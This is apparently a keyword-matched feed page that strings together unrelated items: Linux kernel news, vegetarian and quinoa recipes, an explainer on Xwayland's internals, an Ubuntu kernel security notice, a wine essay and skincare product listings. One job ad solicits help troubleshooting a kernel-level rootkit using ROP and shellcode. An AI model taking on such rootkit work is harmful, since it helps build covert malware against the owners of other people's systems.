If all goes according to plan, the Linux 4.12 kernel will be officially released before the weekend is through. Here's a recap of some of the most exciting changes for this imminent kernel update...
          Comment on Chameleon and High Sierra… by John   
Appreciate your work, PikerAlpha! When I tried that I got this error: panic cpu - Unable to find driver for this platform/IOKit/Kernel/IOPlatformExpert.cpp:1731
          Comment on XCPM for unsupported Processor… by KGP   
If I understand correctly, Stinga addresses the Kabylake update on 10.12.5. However, I would be interested in the actual Broadwell and Haswell KernelToPatch entries for macOS High Sierra Beta 10.13. Are you planning an update or modification of your "XCPM for unsupported Processor…" thread in the near future?
          Vegetarian Enchilada Pie   
This is my riff on a Utah standby, Chicken Enchilada Pie, which my dear friend Nicole taught me how to make back in Ohio in 1995. The chicken version layered tortillas with sour cream, cream of chicken soup, sauteed onions, cheese, and cooked chicken. My new version, adapted to vegetarian tastes and my progress at Weight Watchers (25 pounds down, yay!), is a different kind of yummy, and it has that quality I love about a good casserole: leftovers that last in the fridge, handy for lunching or snacks for me and other adults in the house for the days that follow.

I hear Nicole's in China now. She's lived around the world since our days in Ohio. She's such an excellent cook (and seamstress and business manager) I wonder what great things she's done since our daughters were small.

1.5 to 2 Tbsp oil
1 medium summer squash
1 medium-small zucchini
1 red bell pepper
half a large red (or other) onion
8-10 oz mushrooms
half a pound frozen corn kernels
2 1/2 cups shredded cheese
5-7 corn tortillas, which tend to be small.
28-ounce can of enchilada sauce, I like the green kind.

1. Pre-heat the oven to 350F, because that's how to cook any casserole.

2. Dice the vegetables small, heat the oil in the pan over medium-high, then add the vegetables and saute. Here you can see the proportions.


Oh, I forgot to add the mushrooms and corn. I buy the pre-sliced mushrooms, and then chop them further from there. The corn really ought to be microwave-cooked first, but I just threw it in the pan, which slowed things down and reduced the quality of the cooking vegetables. Oh well.


Now it's all mixed together. I really love the colors--this is why one of my Christmas side dishes for years was zucchini-bell pepper-corn.


Now that's cooked; it's time to layer. Cover the bottom of the pan with 1/4 of the sauce, then layer two tortillas, half of the vegetables, another dose of sauce, and 1/3 of the cheese.

Let's peek ahead with this layers diagram for the finished casserole. The fraction is how much of that item to put in that layer.

cheese (1/3)
sauce (1/4)
tortillas (1/3)
cheese (1/3)
sauce (1/4)
vegetables (1/2)
tortillas (1/3)
cheese (1/3)
sauce (1/4)
vegetables (1/2)
tortillas (1/3)
sauce (1/4)
\________pan________/

Here I'm in process covering those first tortillas with my first layer of veggies.


Sauce on the second layer, and repeat as before.


Cheese going on just before another layer of tortilla. If I'm going to use cheese, I use real cheese, not reduced-fat stuff. It doesn't take much (relative to what I used to do, perhaps) to give it that cheese-in-mix taste. I would have loved a Jack cheese here, but was happy to use the sharp cheddar that was in the house. I think it really adds to the nourishing deliciousness of the meal to use what I have.


And on that front, I wasn't stopped by the fact I only had five corn tortillas in the house. I tore the last one into pieces and spread it around for the top layer thus.


Last layer of sauce and cheese.

Cover and bake at the standard 350F for 30 minutes. This pretty dish (from IKEA years ago) didn't have a lid, so I used foil.


And it's done! I suppose you could remove the foil at the end, if you want the cheese browned as well as bubbly, but for me this is good. Too often I burn the cheese at the end trying to do that. Feel free to send me an acetylene torch.


Was delish, and delish as leftovers for a couple days. Loved and appreciated by everyone over the age of 16--probably could have won the heart of the younger teen if it didn't fall into the inaccurately-named category "Mexican Food." Apparently my love of all things bean, cheese, and tortilla more than met her quota five years ago.

But never mine.


          Quinoa and Black Beans - All Recipes   
I recently bought several pounds of quinoa at a local store that sells damaged and close-to-date items. So, I've been looking around for yummy recipes to use it up. Here's one we tried last week and everyone loved it! I served it with tortilla chips to make it more kid-friendly and had salsa, sour cream and guac on the side.

http://allrecipes.com/Recipe/Quinoa-and-Black-Beans/Detail.aspx


  • 1 teaspoon vegetable oil
  • 1 onion, chopped
  • 3 cloves garlic, peeled and chopped
  • 3/4 cup uncooked quinoa
  • 1 1/2 cups vegetable broth
  • 1 teaspoon ground cumin
  • 1/4 teaspoon cayenne pepper
  • salt and pepper to taste
  • 1 cup frozen corn kernels
  • 2 (15 ounce) cans black beans, rinsed and drained
  • 1/2 cup chopped fresh cilantro

Directions

  1. Heat the oil in a medium saucepan over medium heat. Stir in the onion and garlic, and saute until lightly browned.
  2. Mix quinoa into the saucepan and cover with vegetable broth. Season with cumin, cayenne pepper, salt, and pepper. Bring the mixture to a boil. Cover, reduce heat, and simmer 20 minutes.
  3. Stir frozen corn into the saucepan, and continue to simmer about 5 minutes until heated through. Mix in the black beans and cilantro.

          Hire a Linux Developer with knowledge about kernel level rootkits functionality by aalesh28   
Embedded C based project on a 32-bit Linux processor. Someone with knowledge of how ROP (return oriented programming) is done and of shellcodes. Not a major project; I have done most of the work and just need help with a little bit of troubleshooting... (Budget: $30 - $250 USD, Jobs: C Programming, Embedded Software, Linux, Software Development, Ubuntu)
          Sr Engineer II, SW - Android Systems - Linux Kernel Internals - Device Driver   
HARMAN International - Bangalore, Karnataka - Position Summary: Work on the Android code base, customizing it for car infotainment systems based on the requirements. Work on core Android frameworks for feature completion, performance and stability improvements. Job Responsibilities: Porting, enhancing and customizing exist...
          BSP/Driver   
Spectrosign Software Solutions Pvt. Ltd - Hyderabad/Secunderabad, Telangana - 4 to 8 yrs experience, salary as per industry standards. Requirements: ability to compile, run and tweak the Linux kernel for MIPS/PowerPC platforms; awareness of the Linux kernel and device driver programming. Exposure...
          Kernel 4.1.42 long-term support release announced   
Official Linux kernel site: https://www.kernel.org Long-term support release: 4.1.42 2017-06-29 Changelog…
          Kernel 4.11.8 stable release announced   
Official Linux kernel site: https://www.kernel.org Latest stable kernel: 4.11.8 2017-06-29 Changelog…
          Roman Gilg: Understanding Xwayland - Part 2 of 2   

Last week in part one of this two part series about the fundamentals of Xwayland, we treated Xwayland like a black box. We stated what its purpose is and gave a rough overview on how it connects to its environment, notably its clients and the Wayland compositor. In a sense this was only a teaser, since we didn’t yet look at Xwayland’s inner workings. So welcome to part two, where we do a deep dive into its code base!

You can find the Xwayland code base here. Maybe to your surprise, this is just the code of X.org’s Xserver, which we will refer to simply as the Xserver in the rest of this text. But as a reminder from part one: Xwayland is only a normal Xserver “with a special backend written to communicate with the Wayland compositor active on your system.” This backend is located in /hw/xwayland. To understand why we find this special backend here, and what I mean by an Xserver backend at all, we first have to learn some Xserver fundamentals.

DIX and DDX

The hw subdirectory is the Device Dependent X (DDX) part of the Xserver; all other directories in the source tree form the Device Independent X (DIX) part. This split is an important abstraction in the Xserver. As the names suggest, the DIX part is supposed to be generic enough to be the same on every imaginable hardware platform. "Hardware" should be understood abstractly here as whatever environment the Xserver runs in and has to talk to, which could be the kernel with its DRM subsystem and hardware drivers or, as we already know, a Wayland compositor. On the other side, all code that potentially differs with the environment the Xserver is compiled for is bundled into the DDX part. Since this code is by its very definition mostly responsible for establishing and maintaining the required communication channels with the environment, we can indeed call the platform-specific code paths in DDX the Xserver's backends.

I want to emphasize that the Xserver is compiled for different environments, because this explains how the Xorg and Xwayland binaries we talked about in part one, which both implement a full Xserver, come into existence: Autotools, the build system of the Xserver, is told via configuration parameters before compilation which target platforms are intended. For each enabled target platform it will then use the respective subdirectory in hw to compile a binary with that platform's DDX plus the generic DIX from the other top-level directories. For example, to compile only the Xwayland binary, you can use this command from the root of the source tree:

./autogen.sh --prefix=/usr --disable-docs --disable-devel-docs \
  --enable-xwayland --disable-xorg --disable-xvfb --disable-xnest \
  --disable-xquartz --disable-xwin

Coming back to the functionality, let's look at two examples to better understand the DIX/DDX divide and how the two parts interact. Take first the concept of regions: a region specifies a certain portion of the view displayed to the user. It is defined by values for its width, height and position in some coordinate system. How regions work is therefore completely independent of the hardware the Xserver runs on, which allowed the Xserver's creators to put all the region code in the DIX part of the server.

Talking about regions in a view, we think directly of the screen this view is displayed on. That's the second example. We can always assume that there is some sort of real or emulated screen, or even multiple of them, to display our view. But how these screens and their properties are retrieved depends on the environment. So there needs to be some "screen code" in DDX, while on the other hand we want to move as much logic as possible into the DIX to avoid rewriting shared functionality for different platforms.

The Xserver is equipped with tools to facilitate this dichotomy. In our screen example, the DIX represents the generic part of a screen in its _Screen struct. But the struct also features the void pointer field devPrivate, which the DDX part can point at some struct of its own that provides the device-dependent information for the screen. When the DIX then calls into the DDX to do something concerning the screen, it also hands over a _Screen pointer, and the DDX can retrieve its information through the devPrivate pointer. Such a private resource pointer features in several core objects of the Xserver; for example, we also find one in the _Window struct for windows.

Besides this information sharing between DIX and DDX, there are of course also procedures triggered in one part that reach into the other, and these procedures run according to the main event loop. We will learn more about them now, as we finally analyze the Xwayland DDX code itself.

The Xwayland DDX

The names of the source files in the /hw/xwayland directory already indicate what they do. Luckily there are not many of them, and most of the files are rather compact. It's quite a feat that the creators of Xwayland were able to provide X backward compatibility in a Wayland session with so few lines of code added on top of the generic part of a normal Xserver. This is of course only possible thanks to the abstractions described above.

But coming back to the files, here is an overview of all of them with short descriptions:

  • xwayland.h, xwayland.c - Basically the entry point to everything else; they define and implement the most central structs and functions of the Xwayland DDX.
  • xwayland-output.c - Provides a representation of a display/output. All its data is of course received from the Wayland server.
  • xwayland-cvt.c - Supports output creation by generating a display mode calculated from the available information.
  • xwayland-input.c - Deals with input from mice and other input devices. As its size suggests, it is not the most straightforward area to work on.
  • xwayland-cursor.c - Makes a cursor appear; in a graphics pipeline the cursor is often treated as a special case to reduce repaints.
  • xwayland-glamor.c, xwayland-shm.c - Provide two different ways of allocating graphics buffers.
  • xwayland-glamor-xv.c, xwayland-vidmode.c - Support hardware-accelerated video playback and older games; in parts not yet fully functional.

In the following we will restrict our analysis to the xwayland.* files, in order to keep the growing length of this article in check.

Some basic structs and functions, shared with the other source files, are defined in the header file xwayland.h. A good first point to remember: all structs and functions whose names start with xwl_ are known only to the Xwayland DDX and won't be called from anywhere else. At the beginning of the xwayland.c file, however, we find some functions without the prefix. These are declared in the DIX, and their implementation is required to make Xwayland a fully functional DDX.

Scrolling down to the end of the file, we see the main entry point to the DDX on server startup, the InitOutput function. If you look closely, you will notice a call to AddScreen, where we also hook up an Xwayland-internal screen init function as one of its arguments. But it's only called once! So what about multiple screens? The explanation is that Xwayland uses the RandR extension for its screen management and here only asks for the creation of one screen struct as a dummy, which at runtime holds some global information about the Wayland environment. We looked at this particular screen struct in the previous chapter as an example of information sharing between DIX and DDX through void pointers set by the DDX.

Although it's only a dummy, we can follow this live in action in the hooked-up init function xwl_screen_init. Here, with the help of some DIX methods, we set a hash key so the data field can be identified again later, and then set the data itself: an xwl_screen struct with static information about the Wayland environment the Xwayland server is deployed in.

Also quite interesting in the hooked-up init function is the later manipulation of the function pointers RealizeWindow, UnrealizeWindow and so on. I asked Daniel about it, because at first I didn't understand the steps done here, or the similar ones later in the involved functions xwl_realize_window, xwl_unrealize_window and so on. Daniel explained the mechanism well to me, and it is quite nifty indeed. Thanks to this trick, called wrapping, Xwayland and other DDXs can intercept DIX calls to a procedure like RealizeWindow, execute their own code, and then continue the procedure so that, from the DIX's point of view, it looks like nothing happened.

In the case of RealizeWindow, which is called when a window has been created and is ready to be displayed, we intercept it with xwl_realize_window. There an Xwayland-internal representation of type struct xwl_window is allocated with all the Xwayland-specific additional information, in particular a Wayland surface. At the end, the request to create the surface is sent to the Wayland server via the Wayland protocol. You can probably imagine what UnrealizeWindow and the wrapped xwl_unrealize_window do, and that they do it in a very similar way.

As a last point, let's look at the event loop and the dispatch of buffers with possibly new or changed graphical content. We have block_handler, which was registered with the DIX in xwl_screen_init and gets called continuously throughout the event loop. From here we call into a global damage-posting function, and from there, for each window, into xwl_window_post_damage. If we're lucky we get a hardware-accelerated buffer from the implementation in xwayland-glamor.c, or otherwise an unaccelerated one from xwayland-shm.c; we attach it to the surface and fire it away. In the next event loop iteration we play the same game.

Forcing an end to this article: what we ignored entirely is input handling in Xwayland, and we only touched on the graphics buffers at the end. But the graphics buffers are exactly what we’ll discuss exhaustively in the coming weeks, since my Google Summer of Code project is all about these little guys.


          Comment on Reliably compromising Ubuntu desktops by attacking the crash reporter by Ted Mielczarek   
I have to admit, I don't even really understand the utility of having the MIME type association for Apport. In normal functioning it gets launched by way of /proc/sys/kernel/core_pattern when an application crashes. Is there real value in being able to load an arbitrary .crash file from the desktop environment? I wonder if this is one of those things that's cargo-culted, or maybe encouraged by some misguided guidelines, like "any application that writes a file should support opening it from the file manager"? In any event, nice work on finding and reporting the vulnerabilities!
          Comment on Reliably compromising Ubuntu desktops by attacking the crash reporter by cron.weekly issue #59: Kernel 4.0, Java, containerd, sfb, Redis, CentOS 7.3, Nginx, Ansible & more!   
[…] Reliably compromising Ubuntu desktops by attacking the crash reporter […]
          Re: Confirmed: OnePlus 5’s Display is Upside-Down – Likely Causes Jelly Scrolling   

They did not deliberately choose to mount the display upside down: there is simply no reason to. Someone made a mistake (perhaps his head was screwed on the wrong way?) and it was cheaper for them to make changes in the kernel. They just had no idea there would be a jelly effect. It happens to OEMs. Remember Samsung's exploding batteries? The only conclusion is this: stay away from such OEMs, for good...


          HANA Forum | Re: processing alerts and monitoring SAP HANA   
Any queries based on the system views, for example M_LOAD_HISTORY_[HOST|SERVICE]

Code: select top 10 * from M_LOAD_HISTORY_SERVICE where CPU > X and WAITING_THREAD_COUNT > Y


or
Code: select * from M_SAVEPOINTS where CRITICAL_PHASE_DURATION > 1000000


and so on; it depends on your imagination

Statistics: Posted by kernelpanic • Fri, Jun 30 2017, 19:42 • Replies 8 • Views 154

          Hire a Linux Developer with knowledge about kernel level rootkits functionality by aalesh28   
Embedded C based project on a 32-bit Linux processor. Someone with knowledge of how ROP (return-oriented programming) is done, and of shellcodes. Not a major project; I have done most of the work and just need help with a little bit of troubleshooting... (Budget: $30 - $250 USD, Jobs: C Programming, Embedded Software, Linux, Software Development, Ubuntu)
          What I did with left over roast chicken   
I have to say that the original roasted chicken was absolutely delicious.  Moist as could be.  And the gravy I made was also excellent, if I say so myself.  I have found that even on cruises, most things I ask for, I prefer the way I fix better.  I realize I'm not making a dish for 2,000 people so I can take my time and care more about it.  No assembly-line food in my house, unless I want it (go out to eat or go on a cruise, or something like that).

Tonight I made something with the left-over chix from yesterday, and it was really, really good.  A surprise.

First I made the rice (1 cup water, 1/2 cup rice).  I boiled the water, put the rice in, and then simmered it until the water was all used up and the rice was cooked.  I did add salt to the water.
While the rice was cooking, I mixed one can of low-sodium/fat cream of chicken soup to 3/4 of a can of Half and half.  I stirred that all together to get it ready for the rice.

And while the rice was still cooking, I took 6 slices of American cheese -- which I had in the fridge for Alan's sandwiches -- and cubed it, or cut it into small pieces and set that aside.  I put 1/2 cup of parmesan cheese (grated) into the soup mixture. 

And while the rice was cooking, I took the left over chicken which I had ripped off the carcass last night and made the pieces a bit smaller.

When the rice was finished cooking, I put it into the soup and stirred it real good, then I added the cheese and the chicken, stirring them into the soup/rice.  On top of the whole thing I sprinkled  Stove Top Stuffing Mix -- just enough to cover it.

I put it in a pre-heated 350 degree oven for 1/2 hour -- it was really bubbling away when I opened the oven, and the stuffing mix was really crispy.

I dished it up onto a plate, sprinkled some black pepper over it, and dug in.  I have to say, it was really yummy and the rice was cooked.

I think I finally learned how to make a rice casserole where the rice cooks through.  No hard kernels this time!

ttfn
          Who are the Future “Thought Leaders” for Italian Wine?   
With harvest behind us and winemaking for the year finished, Italians in the wine trade are living out of their suitcases. Traveling to markets around the world, attending portfolio tastings and working with salespeople in the trenches. Last week there was Prowein. This week all eyes turn to Bordeaux for their annual UGC 2016 vintage tastings. But soon there will be Vinitaly. Emails are being sent to round up prospective new clients and export markets. Seminars are being scheduled. Dinners, which will go late into the night, are being planned, in and around Verona. And there are all the people planning travel to Italy to visit and taste, before and after Vinitaly. All this eating and drinking and tasting and talking, what will come of it?


Armando de Rham with Luciano de Giacomi at Bricco del Drago
The process of making wine may seem, on the surface, to be an activity confined to a facility that processes grapes into the precious liquid, but that is only part of it. Of course, as has been told time and again, there is the vineyard and all the practices that farmers and gardeners are concerned with. There is the spiritual connection, terroir as the Omniscient Presence, the invisible Guiding Hand that makes every tiny parcel unique and particular.

And there is the ongoing conversation among wine lovers and influencers, over the direction wine is taking, as it is guided by the hand of men and women who are the servants of the vine.

I kiddingly use the term “slaves to the wine god,” but there is a kernel of truth inside that phrase. If one understands that connection, it makes all the difference in the world. It is the difference between taking off early on a Friday and going to lunch, popping some bottles and posting one’s trophies on Instagram or Facebook, and taking a bottle (or bottles) to see a client in the hopes of finding more homes for those wines over which the men and women back in the vineyards slaved so hard.

Salvo Foti in his Aeris vineyard in Milo, on Etna
Somewhere in this process, there are people who are actually concerned with the future of wine, not just one’s immediate visceral pleasures. People who understand history, or have even made some of it, who know Italian wine wasn’t always at the top of the charts when it came to quality and appreciation.

It’s hard for someone who hasn’t been in the game for very long to understand this: Italian wines, at one point, were lacking, some would say even awful. White wines, especially. This observer noticed, around the early 1980s, that a transformation was taking place inside wineries. Italy was coming out of its slumber. The economy was creating more opportunities, and especially in a global sense, markets that had once been dominated by France were opening up to wine from Italy. It was, and is, an extremely exciting time. Again, though, there was some direction, some thought, some philosophy that had to be put into action in order for that transformation to proceed.

So, now we are at the mountain top. Where do we go now? Who are the 21st-century Antinoris, Gajas, Quintarellis, Mastroberardinos? Who is leading Italian wine into the future, not only with their wine but with their ideas?

Alessandro de Renzis Sonnino in his venerable vinsantaio
That is the stuff people will talk over in the coming days, at late-night dinners over bottles of Vin Santo. Along with the changing political climate that is affecting every one of us on earth, the economic gyrations, the mass movement of humans across the globe. That and the fundamental questions many of us ask, often: what am I doing here? Am I making a difference? It might take more than a bottle of Vin Santo.

Consider this: the experience a young winemaker has over a winter break, whether trekking across Myanmar or swimming in Miami, can affect their perception of their place in the world. And we are in a unique time now, as subliminal factors enter into the experience of young Italians in the wine trade, who go back to Barolo or Montalcino with experiences that alter their philosophy about wine. These modern-day Marco Polos, en masse, are like tiny drops of water - drip, drip, drip - slowly impressing a concavity into the stone. Do you not find this to be an exciting time for Italian wine? For sure, there are those souls who care not to venture any further from their farm in Pontignano than maybe Florence, or in Barbaresco than perhaps Torino. And we need those people too. They are the grounding rod for the process. They prevent Chianti from turning into Shiraz or Barbaresco into Merlot.

Arianna Occhipinti - in Fossa di Lupo
I know I’ve lost some of you with this. In fact, in the last few months I’ve probably lost many more to the many distractions and chatter in our everyday lives of the here and now. The pressing issues of the day, the scandals, the dramas, the nerve wracking, heart pounding, stress inducing dilemmas at our doorstep. But take a step back, for a minute, let those daily things be, and just think about where we’re at in regards to Italian wine and what it means to you, reading this. Hasn’t it blossomed beautifully in your lifetime? Haven’t those gardeners of the soul of Italian wine done an amazing job?

We’ve come a long way in the last 7,000 or 8,000 years. And the last 70 have been probably the most impactful of them all. But those pioneers are older now. And while their light hasn’t dimmed, their time on the stage is passing. Their sons and daughters, and grandchildren, are swarming the center line. Which of them are gazing into the deep pool of time with the thirst for leading us where no one has gone before?







          Linux Kernel 4.8.9 Denial Of Service Vulnerability   
The TCP stack in the Linux kernel before 4.8.10 mishandles skb truncation, which allows local users to cause a denial of service (system crash) via a crafted application that makes sendto system calls, related to net/ipv4/tcp_ipv4.c and net/ipv6/tcp_ipv6.c.
          Linux Kernel 3.10 device compromise Execute Code Vulnerability   
The Linux Kernel is prone to a local code-execution vulnerability. A local attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts may result in a denial-of-service condition.
          4 Slackware Updates   
The following updates have been released for Slackware: bind (SSA:2017-180-02) httpd (SSA:2017-180-03) libgcrypt (SSA:2017-180-04) Slackware 14.1 kernel (SSA:2017-180-01)...
          Aveeno Bath & Shower Oil 250ml   

It is used in homeopathy to prepare moisturising skin...preparations. The oil also contains liquid paraffin (sometimes known as mineral oil) and sunflower seed oil, and works by providing a layer of oil on the surface of the skin to prevent water evaporating from the skin surface. With natural Colloidal Oatmeal. Suitable for people who may be prone to eczema. Aveeno Oil for Bath & Bodycare and Shower, with Colloidal Oatmeal and softening oils, thoroughly cleanses, moisturises and conditions dry and sensitive skin.

May be used in bath and shower. Use - Bath & Bodycare: add approximately 30ml (2 tablespoons) to the bath water. Shower: massage directly onto wet skin and then rinse.

Ingredients: Paraffin Liquidum, Helianthus Annus, (Sunflower) Seed Oil, Diethylhexyl Adipate, Sorbeth-40 Hexaoleate, Avena Sativa (Oat) Kernel Flour, Silica, Cera Alba, Tocopheryl Acetate, Ascorbyl Palmitate, Triclosan, Parfum.

Price: £7.70 Special Price: £7.09


          Aveeno Cream 100ml   

Regular use of Aveeno Cream helps prevent dryness and irritation caused by skin dehydration. Aveeno is suitable for dry, sensitive skin and also for people who may be prone to eczema.

Contains: Oatmeal, allantoin, glycerin. Ingredients: Aqua, Glycerin, Distearyldimonium Chloride, Isopropyl Palmitate, Paraffinum Liquidum, Cetyl Alcohol, Dimethicone, Avena Sativa (Oat) Kernel Flour, Allantoin, Paraffin, Cera Microcristallina, Stearyl Alcohol, Myristyl Alcohol, Isopropyl Alcohol, Sodium Chloride, Benzyl Alcohol.

Price: £6.80 Special Price: £6.45


          Aveeno Hand Cream 75ml   

Aveeno Hand cream absorbs quickly and leaves dry hands looking and feeling soft, smooth and healthy.

Ingredients: Aqua, Glycerin, Distearyldimonium Chloride, Isopropyl Palmitate, Paraffinum Liquidum, Cetyl Alcohol, Dimethicone, Avena Sativa (Oat) Kernel Flour, Allantoin, Paraffin, Cera Microcristallina, Stearyl Alcohol, Myristyl Alcohol, Isopropyl Alcohol, Sodium Chloride, Benzyl Alcohol.

Price: £6.50 Special Price: £5.85


          Aveeno Moisturising Cream 300ml   

Aveeno Moisturising Cream combines the concentrated goodness of finely-milled naturally active Colloidal Oatmeal with rich emollients.
This unique formula is clinically proven to go beyond 24 hour moisturisation and
replenish the skin's natural barrier function, to significantly improve the condition of dry skin in just two weeks.
Absorbs quickly and leaves skin looking and feeling soft and smooth and healthy.

Ingredients: Aqua, Glycerin, Distearyldimonium Chloride, Isopropyl Palmitate, Paraffinum Liquidum, Cetyl Alcohol, Dimethicone, Avena Sativa Kernel Flour, Allantoin, Paraffin, Cera Microcristallina, Stearyl Alcohol, Myristyl Alcohol, Isopropyl Alcohol, Sodium Chloride, Benzyl Alcohol.

Price: £12.50 Special Price: £11.05


          Aveeno Skin Relief Moisturising Lotion with Shea Butter 200ml   

Aveeno with Shea Butter is clinically proven to moisturise for 24 hours and soothe on contact, providing immediate, long lasting relief for extra dry, irritable skin.

Skin is left looking and feeling soft, smooth and healthy.

Fragrance free and fast absorbing. Dermatologist tested. With Triple Oat Complex. Immediately relieves and nourishes extra dry, irritable skin. Moisturises for 24 hours.

Shea Butter Ingredients: Aqua, Glycerin, Distearyldimonium Chloride, Isopropyl Palmitate, Paraffinum Liquidum, Cetyl Alcohol, Dimethicone, Avena Sativa (Oat) Kernel Flour, Allantoin, Paraffin, Cera Microcristallina, Stearyl Alcohol, Myristyl Alcohol, Isopropyl Alcohol, Sodium Chloride, Benzyl Alcohol.

Price: £6.25 Special Price: £6.10


          Nelsons Rhus Tox Cream For Rheumatic Conditions 30g   

Ingredients: Rhus Toxicodendron 6x 9% v/w. Purified Water, Glyceryl monostearate + Macrogol stearate, Apricot kernel oil, Theobroma oil, glycerol Polawax GP200 (cetearyl alcohol, PEG 20 Stearate), Cetostearyl alcohol, cetyl palmitate, Glyceryl monocaprylate, Methyl parahydroxybenzoate, Propyl parahydroxybenzoate.
Directions: Check that the tube seal is not broken, then pierce it with the point in the top of the cap before first use.
Massage gently into the affected area as required.
Precautions: Keep all medicines out of reach of children. Side effects are rare. If you notice anything unusual or symptoms persist, consult your doctor.
If pregnant or breastfeeding consult your doctor before use. Do not use if sensitive to any of the ingredients.

Price: £4.65 Special Price: £4.35


          Phytolisse Express Smoothing Mask For Unruly, Frizzy and Rebellious Hair 200ml    

Phyto Phytolisse Express Smoothing Mask is packed with ultra-performing smoothing agents; it instantly detangles, straightens and nourishes hair. A derivative of pine pulp shields each hair strand from humidity and smoothes the cuticle down for a long-lasting anti-frizz result. A synergy of red and brown algae tames unruly and rebellious hair, resulting in sleek, frizz-free hair. Enriched with nurturing apricot kernel oil, its delicately scented formula leaves hair shiny, supple and silky soft.

Price: £24.50 Special Price: £19.00


          USN-3342-2: Linux kernel (HWE) vulnerabilities    

Ubuntu Security Notice USN-3342-2

29th June, 2017

linux-hwe vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 LTS

Summary

Several security issues were fixed in the Linux kernel.

Software description

  • linux-hwe - Linux hardware enablement (HWE) kernel

Details

USN-3342-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.10.
This update provides the corresponding updates for the Linux Hardware
Enablement (HWE) kernel from Ubuntu 16.10 for Ubuntu 16.04 LTS.

USN-3333-1 fixed a vulnerability in the Linux kernel. However, that
fix introduced regressions for some Java applications. This update
addresses the issue. We apologize for the inconvenience.

It was discovered that a use-after-free flaw existed in the filesystem
encryption subsystem in the Linux kernel. A local attacker could use this
to cause a denial of service (system crash). (CVE-2017-7374)

Roee Hay discovered that the parallel port printer driver in the Linux
kernel did not properly bounds check passed arguments. A local attacker
with write access to the kernel command line arguments could use this to
execute arbitrary code. (CVE-2017-1000363)

Ingo Molnar discovered that the VideoCore DRM driver in the Linux kernel
did not return an error after detecting certain overflows. A local attacker
could exploit this issue to cause a denial of service (OOPS).
(CVE-2017-5577)

Li Qiang discovered that an integer overflow vulnerability existed in the
Direct Rendering Manager (DRM) driver for VMWare devices in the Linux
kernel. A local attacker could use this to cause a denial of service
(system crash) or possibly execute arbitrary code. (CVE-2017-7294)

It was discovered that a double-free vulnerability existed in the IPv4
stack of the Linux kernel. An attacker could use this to cause a denial of
service (system crash). (CVE-2017-8890)

Andrey Konovalov discovered an IPv6 out-of-bounds read error in the Linux
kernel's IPv6 stack. A local attacker could cause a denial of service or
potentially other unspecified problems. (CVE-2017-9074)

Andrey Konovalov discovered a flaw in the handling of inheritance in the
Linux kernel's IPv6 stack. A local user could exploit this issue to cause a
denial of service or possibly other unspecified problems. (CVE-2017-9075)

It was discovered that dccp v6 in the Linux kernel mishandled inheritance.
A local attacker could exploit this issue to cause a denial of service or
potentially other unspecified problems. (CVE-2017-9076)

It was discovered that the transmission control protocol (tcp) v6 in the
Linux kernel mishandled inheritance. A local attacker could exploit this
issue to cause a denial of service or potentially other unspecified
problems. (CVE-2017-9077)

It was discovered that the IPv6 stack in the Linux kernel was performing
its over write consistency check after the data was actually overwritten. A
local attacker could exploit this flaw to cause a denial of service (system
crash). (CVE-2017-9242)

Update instructions

The problem can be corrected by updating your system to the following package version:

Ubuntu 16.04 LTS:
linux-image-4.8.0-58-lowlatency 4.8.0-58.63~16.04.1
linux-image-4.8.0-58-generic-lpae 4.8.0-58.63~16.04.1
linux-image-generic-hwe-16.04 4.8.0.58.29
linux-image-lowlatency-hwe-16.04 4.8.0.58.29
linux-image-4.8.0-58-generic 4.8.0-58.63~16.04.1
linux-image-generic-lpae-hwe-16.04 4.8.0.58.29

To update your system, please follow these instructions: https://wiki.ubuntu.com/Security/Upgrades.

After a standard system update you need to reboot your computer to make
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,
linux-powerpc), a standard system upgrade will automatically perform
this as well.

References

CVE-2017-1000363, CVE-2017-5577, CVE-2017-7294, CVE-2017-7374, CVE-2017-8890, CVE-2017-9074, CVE-2017-9075, CVE-2017-9076, CVE-2017-9077, CVE-2017-9242, LP: 1699772, https://www.ubuntu.com/usn/usn-3333-1


          Linux Kernel ldso_dynamic Stack Clash Privilege Escalation   
Linux kernel ldso_dynamic stack clash privilege escalation exploit. This affects Debian 9/10, Ubuntu 14.04.5/16.04.2/17.04, and Fedora 23/24/25.
          Linux Kernel ldso_hwcap_64 Stack Clash Privilege Escalation   
Linux kernel ldso_hwcap_64 stack clash privilege escalation exploit. This affects Debian 7.7/8.5/9.0, Ubuntu 14.04.2/16.04.2/17.04, Fedora 22/25, and CentOS 7.3.1611.
          Linux Kernel offset2lib Stack Clash   
Linux kernel offset2lib stack clash exploit.
          Ubuntu Security Notice USN-3342-2   
Ubuntu Security Notice 3342-2 - USN-3342-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.10. This update provides the corresponding updates for the Linux Hardware Enablement kernel from Ubuntu 16.10 for Ubuntu 16.04 LTS. USN-3333-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. It was discovered that a use-after-free flaw existed in the filesystem encryption subsystem in the Linux kernel. A local attacker could use this to cause a denial of service. Various other issues were also addressed.
          Linux Kernel ldso_hwcap Stack Clash Privilege Escalation   
Linux kernel ldso_hwcap stack clash privilege escalation exploit. This affects Debian 7/8/9/10, Fedora 23/24/25, and CentOS 5.3/5.11/6.0/6.8/7.2.1511.
          Slackware: 2017-180-01: Slackware 14.1 kernel Security Update   
LinuxSecurity.com: New kernel packages are available for Slackware 14.1 to fix security issues.
          Episode 50: Low down on PSR-15   

An all star cast this episode, as Ben and Phil are joined by regular guest Anthony Ferrara - thinker of good ideas and long-time part-time side-line contributor to the PHP-FIG, Woody Gilk - one-speed rider & BDFL of Kohana, and Beau Simensen - author of a bunch of stuff including StackPHP.

Here we’re talking about some awesome stuff the PHP-FIG is working on: PSR-15 (HTTP Middleware). This PSR is in Draft mode, and is potentially not as well known as some others. There was a bit of a kerfuffle getting it started, as even before it had passed an entrance vote there were alternatives and rewrites being suggested, but now the major players are on the same page and things are moving forward.

We discuss all this, and the reason PSR-7 (HTTP Message) is not enough for the ecosystem to benefit from shareable middleware. Jumping away from PSR-15 for a second, there is an interesting bit of insight into why the PHP-FIG didn’t just slap a “PSR” sticker on Symfony’s HTTP Kernel or HTTP Foundation.

